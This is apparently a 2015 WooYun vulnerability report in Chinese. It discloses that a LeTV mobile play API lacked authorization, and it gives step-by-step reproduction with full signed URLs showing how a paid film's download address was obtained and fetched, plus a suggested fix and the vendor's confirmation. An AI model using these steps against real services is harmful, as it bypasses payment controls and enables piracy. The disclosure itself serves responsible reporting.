当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141445

漏洞标题:乐视网某api权限设置不当导致视频可以任意下载

相关厂商:乐视网

漏洞作者: 小Q

提交时间:2015-09-16 09:06

修复时间:2015-11-01 09:46

公开时间:2015-11-01 09:46

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-16: 细节已通知厂商并且等待厂商处理中
2015-09-17: 厂商已经确认,细节仅向厂商公开
2015-09-27: 细节向核心白帽子及相关领域专家公开
2015-10-07: 细节向普通白帽子公开
2015-10-17: 细节向实习白帽子公开
2015-11-01: 细节向公众公开

简要描述:

乐视网某api权限设置不当导致可以随意获取视频下载地址

详细说明:

以收费电影《小时代4:灵魂尽头》为例,

010.jpg

地址 http://www.letv.com/ptv/vplay/23174476.html 那么vid=23174476;
通过API接口 http://api.mob.app.letv.com/play?vid=23174476 可获取各个清晰度的解析地址,

011.jpg

我们以MP4_180的mainurl为例:

http:\/\/g3.letv.cn\/vod\/v2\/MTc2LzIzLzkzL2xldHYtdXRzLzE0L3Zlcl8wMF8yMi0zMjM5ODY0MjMtYXZjLTQ3NTY4OS1hYWMtMzIwMDEtNjk3MDQxNy00NDk5NDgxNTctNmQ2MTU4MzA2N2FjMGQ2Mzc3OGMwOTQ3NTBmZjBlM2QtMTQzNzk3MTg2OTMxNy5tcDQ=?b=516&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&platid=3&splatid=302&playid=0&tss=no&vtype=13&cvid=1576692383917&payff=1&pip=00d5b40bb977e724401eb25fe303c2f8&format=1&sign=mb&dname=mobile&expect=3&tag=mobile

,注意要把“\”符号清理掉,得到地址

http://g3.letv.cn/vod/v2/MTc2LzIzLzkzL2xldHYtdXRzLzE0L3Zlcl8wMF8yMi0zMjM5ODY0MjMtYXZjLTQ3NTY4OS1hYWMtMzIwMDEtNjk3MDQxNy00NDk5NDgxNTctNmQ2MTU4MzA2N2FjMGQ2Mzc3OGMwOTQ3NTBmZjBlM2QtMTQzNzk3MTg2OTMxNy5tcDQ=?b=516&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&platid=3&splatid=302&playid=0&tss=no&vtype=13&cvid=1576692383917&payff=1&pip=00d5b40bb977e724401eb25fe303c2f8&format=1&sign=mb&dname=mobile&expect=3&tag=mobile


找一个离自己近的地址,一定注意拷贝完整地址,结尾参数是cips,不明显的话可以放到JS格式化工具里面,访问将得到下载地址

012.jpg


http:\/\/122.72.111.116\/176\/23\/93\/letv-uts\/14\/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51


同样把“\”符号清理掉,得到地址

http://122.72.111.116/176/23/93/letv-uts/14/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51


放到迅雷里面下载看看,速度是很快的,

013.jpg


下载完播放看看,

014.jpg


注意地址是时刻变化的,再现的时候需要按照当时的地址进行解析

漏洞证明:

以收费电影《小时代4:灵魂尽头》为例,
通过api得到地址

http://122.72.111.116/176/23/93/letv-uts/14/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51


迅雷下载,

013.jpg


播放视频,

014.jpg


修复方案:

将API接口 http://api.mob.app.letv.com/play?vid= 做访问授权限制

版权声明:转载请注明来源 小Q@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-09-17 09:45

厂商回复:

感谢提交,联系开发正在修复。

最新状态:

暂无